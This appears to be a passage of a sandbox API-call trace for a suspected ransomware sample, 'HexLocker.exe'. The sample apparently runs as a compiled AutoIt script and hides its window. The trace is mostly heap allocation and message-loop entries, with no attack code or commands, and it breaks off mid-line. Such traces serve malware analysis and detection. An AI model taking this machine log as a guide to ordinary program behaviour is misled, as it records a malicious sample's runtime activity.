RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0121.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0e0 [0121.923] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0121.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0121.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0e0 | out: hHeap=0x970000) returned 1 [0121.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0121.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0a0 [0121.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76660 [0121.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ef80 [0121.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76630 [0121.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76720 [0121.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0121.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e74860 [0121.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0121.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0121.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778a8 [0121.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0121.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7efd0 [0121.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0121.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78ae0 [0121.924] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0121.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76660 | out: hHeap=0x970000) returned 1 [0121.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ef80 | out: hHeap=0x970000) returned 1 [0121.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76720 | out: hHeap=0x970000) returned 1 [0121.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0121.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e74860 | out: hHeap=0x970000) returned 1 [0121.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76630 | out: hHeap=0x970000) returned 1 [0121.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0121.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0a0 | out: hHeap=0x970000) returned 1 [0121.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3c) returned 0x2e78780 [0121.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0121.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0121.925] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", nBufferLength=0x104, lpBuffer=0x8cf840, lpFilePart=0x8cfa54 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", lpFilePart=0x8cfa54*="HexLocker.exe") returned 0x25 [0121.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x971c70 | out: hHeap=0x970000) returned 1 [0121.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e588b8 [0121.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x971c48 | out: hHeap=0x970000) returned 1 [0121.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e791d0 [0121.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x971c98 | out: hHeap=0x970000) returned 1 [0121.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e520 [0121.925] GetSysColorBrush (nIndex=15) returned 0x100072 [0121.926] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0121.926] LoadIconW (hInstance=0x400000, lpIconName=0x63) returned 0xb01b7 [0121.929] LoadIconW (hInstance=0x400000, lpIconName=0xa4) returned 0xc0127 [0121.932] LoadIconW (hInstance=0x400000, lpIconName=0xa2) returned 0x2702a9 [0121.933] LoadImageW (hInst=0x400000, name=0x63, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0xb00df [0121.935] RegisterClassExW (param_1=0x8cfa30) returned 0xc1ac [0121.935] GetSysColorBrush (nIndex=15) returned 0x100072 [0121.935] RegisterClassExW (param_1=0x8cf9d8) returned 0xc1ad [0121.935] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc08a [0121.935] InitCommonControlsEx (picce=0x8cfa08) returned 1 [0121.937] ImageList_Create (cx=16, cy=16, flags=0x21, cInitial=1, cGrow=1) returned 0xa7c860 [0121.942] LoadIconW (hInstance=0x400000, lpIconName=0xa9) returned 0xd01cb [0121.944] ImageList_ReplaceIcon (himl=0xa7c860, i=-1, hicon=0xd01cb) returned 0 [0122.127] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3", lpWindowName="AutoIt v3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=100, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x402c2 [0123.490] DefWindowProcW (hWnd=0x402c2, Msg=0x24, wParam=0x0, lParam=0x8cf5ec) returned 0x0 [0123.491] DefWindowProcW (hWnd=0x402c2, Msg=0x81, wParam=0x0, lParam=0x8cf5e0) returned 0x1 [0123.499] DefWindowProcW (hWnd=0x402c2, Msg=0x83, wParam=0x0, lParam=0x8cf5cc) returned 0x0 [0124.100] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0124.100] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc08a [0124.101] CreatePopupMenu () returned 0x1b02a7 [0124.110] CreateWindowExW (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x50b008c4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x402c2, hMenu=0x1, hInstance=0x400000, lpParam=0x0) returned 0x9005c [0125.182] DefWindowProcW (hWnd=0x402c2, Msg=0x210, wParam=0x10001, lParam=0x9005c) returned 0x0 [0125.182] ShowWindow (hWnd=0x402c2, nCmdShow=0) returned 0 [0125.182] ShowWindow (hWnd=0x402c2, nCmdShow=0) returned 0 [0125.182] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0125.182] TranslateMessage (lpMsg=0x8cf968) returned 0 [0125.182] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0125.183] DefWindowProcW (hWnd=0x402c2, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0125.183] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0125.183] TranslateMessage (lpMsg=0x8cf968) returned 0 [0125.183] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0125.183] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0125.183] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0125.183] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.183] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0125.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ef80 [0125.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0125.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78de8 [0125.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0125.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0125.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0e0 [0125.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78e10 [0125.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76630 [0125.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7efe0 [0125.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76630 | out: hHeap=0x970000) returned 1 [0125.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e791f8 [0125.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76630 [0125.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76660 [0125.184] RtlSizeHeap (HeapHandle=0x970000, Flags=0x0, MemoryPointer=0x970fd0) returned 0x80 [0125.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eff0 [0125.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0125.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7eff0 | out: hHeap=0x970000) returned 1 [0125.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0125.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0e0 | out: hHeap=0x970000) returned 1 [0125.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76660 | out: hHeap=0x970000) returned 1 [0125.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78de8 | out: hHeap=0x970000) returned 1 [0125.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ef80 | out: hHeap=0x970000) returned 1 [0125.184] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0125.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0e0 [0125.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0125.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78d98 [0125.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0125.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0125.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ef80 [0125.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78f78 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7eff0 [0125.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78de8 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76660 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f0b0 [0125.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0125.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0b0 | out: hHeap=0x970000) returned 1 [0125.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0125.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ef80 | out: hHeap=0x970000) returned 1 [0125.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0125.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78d98 | out: hHeap=0x970000) returned 1 [0125.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0e0 | out: hHeap=0x970000) returned 1 [0125.185] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e280 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f060 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78fa0 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0a0 [0125.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e558 [0125.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0125.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76720 [0125.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f0b0 [0125.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0125.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0b0 | out: hHeap=0x970000) returned 1 [0125.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0125.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f060 | out: hHeap=0x970000) returned 1 [0125.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76720 | out: hHeap=0x970000) returned 1 [0125.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e280 | out: hHeap=0x970000) returned 1 [0125.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.186] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0125.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0e0 [0125.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0125.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e788 [0125.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0125.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0125.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0b0 [0125.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78fc8 [0125.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76720 [0125.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ef80 [0125.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76720 | out: hHeap=0x970000) returned 1 [0125.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e590 [0125.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76720 [0125.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e746f8 [0125.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f010 [0125.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0125.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0125.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0b0 | out: hHeap=0x970000) returned 1 [0125.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e746f8 | out: hHeap=0x970000) returned 1 [0125.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e788 | out: hHeap=0x970000) returned 1 [0125.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0e0 | out: hHeap=0x970000) returned 1 [0125.187] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e748c0 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0b0 [0125.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e748c0 | out: hHeap=0x970000) returned 1 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79040 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e746f8 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e74860 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79248 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e748c0 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f060 [0125.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e748c0 | out: hHeap=0x970000) returned 1 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79090 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e747e8 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e748c0 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f0e0 [0125.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e746f8 | out: hHeap=0x970000) returned 1 [0125.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0e0 | out: hHeap=0x970000) returned 1 [0125.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e74860 | out: hHeap=0x970000) returned 1 [0125.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e748c0 | out: hHeap=0x970000) returned 1 [0125.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79040 | out: hHeap=0x970000) returned 1 [0125.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0b0 | out: hHeap=0x970000) returned 1 [0125.187] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e74860 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e74860 | out: hHeap=0x970000) returned 1 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78d98 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e74860 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e748c0 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0b0 [0125.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78ff0 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e746f8 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0e0 [0125.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e746f8 | out: hHeap=0x970000) returned 1 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78e38 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e746f8 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2a0 [0125.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e74860 | out: hHeap=0x970000) returned 1 [0125.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2a0 | out: hHeap=0x970000) returned 1 [0125.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e748c0 | out: hHeap=0x970000) returned 1 [0125.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0b0 | out: hHeap=0x970000) returned 1 [0125.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0125.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78d98 | out: hHeap=0x970000) returned 1 [0125.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.188] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78d98 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0b0 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79018 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e74860 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2c0 [0125.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e74860 | out: hHeap=0x970000) returned 1 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78e60 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e74860 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e748c0 [0125.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f210 [0125.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0125.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f210 | out: hHeap=0x970000) returned 1 [0125.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0125.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0b0 | out: hHeap=0x970000) returned 1 [0125.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e748c0 | out: hHeap=0x970000) returned 1 [0125.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78d98 | out: hHeap=0x970000) returned 1 [0125.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0125.189] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e748c0 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f010 [0125.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e748c0 | out: hHeap=0x970000) returned 1 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79040 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e748c0 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0b0 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78d98 [0125.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 